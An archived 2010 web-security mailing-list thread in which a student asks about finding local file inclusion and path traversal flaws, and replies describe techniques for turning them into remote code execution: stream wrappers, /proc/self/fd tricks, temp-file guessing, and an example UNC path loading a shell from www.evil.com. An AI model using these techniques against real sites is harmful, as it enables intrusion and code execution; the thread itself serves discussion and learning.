[WEB SECURITY] local file inclusion and path transversal

kuza55 kuza55 at gmail.com
Tue Feb 16 00:58:57 EST 2010


I haven't done this stuff in a while, so I'm not sure how accurate
this is any more, but non-url stream wrappers worked a while back as a
way to do RFIs:
http://blog.php-security.org/archives/45-PHP-5.2.0-and-allow_url_include.html

UNC paths (\\www.evil.com\shell.php) on windows, probably work too,
since I'm pretty sure PHP just passes things down the the OS if it
doesn't see a stream wrapper- but I haven't tested that  (though
almost no-one runs PHP on windows, so this suggestion may be useless).

If anyone is interested, ascii wrote up a (much more in depth) article
about the /proc/self/fd method described in the paper a while ago:
http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/

It also has some information & links to other interesting methods.

Also, while I never liked the method, it is possible to abuse the fact
that php allows gratuitous file uploads, and simply make a file
upload-style request, and try to guess the filename in /tmp (or the
windows equivalent), there are a bunch of optimisations (I've heard
that interpreter crashes stop the files from being deleted, so you can
create sqrt(n) files - where n in your search space - and then guess
one, with 50% probability in sqrt(n)/2 complexity, also this technique
works better on windows since your n is smaller), but you're going to
need to work that out yourself if you want to use it. However there
was a recent-ish advisory about some file upload DoS in PHP, that iirc
had some info that may be relevant to this.

P.S. To David jacoby: Please don't claim that "This document will
explain a few different new ways" when it is clear you've found all
the information via google. (Either that or you can't seem to use
google to determine that nothing in your "whitepaper" is new)
Having said that summary papers are useful when they are either
complete, or can compare the various techniques against each other or
are well written, sadly your paper is none of these.

GTF off my lawn kids,
 - kuza55

2010/2/15 David Jacoby <David.Jacoby at truesec.se>:
> Hey Guys,
>
> I published a whitepaper, not so long ago about how to get command execution throught file inclusion vulnerabilities on PHP-based webapplications through log poisoning attacks via /proc on *NIX-based operating systems.
>
> http://www.vulndev.se/alternatrive-ways-to-exploit-file-include.pdf
>
> I will update it some day with some SELinux (default policy) bypassing stuff.
>
> Best regards,
> David Jacoby
>
>
>
> --------------------------------------------------------------------------------
> David Jacoby - Truesec AB
> Unix/Linux and alternative systems
>
> Mobil: +46-(0)709-183011
> --------------------------------------------------------------------------------
>
> ________________________________________
> Från: Daniele Bellucci [daniele.bellucci at gmail.com]
> Skickat: den 14 februari 2010 20:17
> Till: Miguel González Castaños
> Kopia: websecurity at webappsec.org
> Ämne: Re: [WEB SECURITY] local file inclusion and path transversal
>
> Have a look to wfuzz, then the wordlist :
> http://www.ikkisoft.com/stuff/dirTraversal.txt
>
>
> 2010/2/14 Miguel González Castaños <miguel_3_gonzalez at yahoo.es>:
>> Hi all,
>>
>>  I keep on studying different hacking techniques. The next assignment is to
>> scan a website to find local file inclusion and path transversal
>> vulnerabilities. I have used the free edition of n-stalker, acunetix and
>> nikto and I haven't found anything. Any howto or (free) vulnerability
>> scanner anyone of you recommend me?
>>
>>  Thanks,
>>
>>  Miguel
>>
>> ----------------------------------------------------------------------------
>> Join us on IRC: irc.freenode.net #webappsec
>>
>> Have a question? Search The Web Security Mailing List Archives:
>> http://www.webappsec.org/lists/websecurity/archive/
>>
>> Subscribe via RSS: http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>>
>> Join WASC on LinkedIn
>> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>>
>>
>
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
> ----------------------------------------------------------------------------
> Join us on IRC: irc.freenode.net #webappsec
>
> Have a question? Search The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
>
> Subscribe via RSS:
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]
>
> Join WASC on LinkedIn
> http://www.linkedin.com/e/gis/83336/4B20E4374DBA
>
>

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS: 
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA



More information about the websecurity mailing list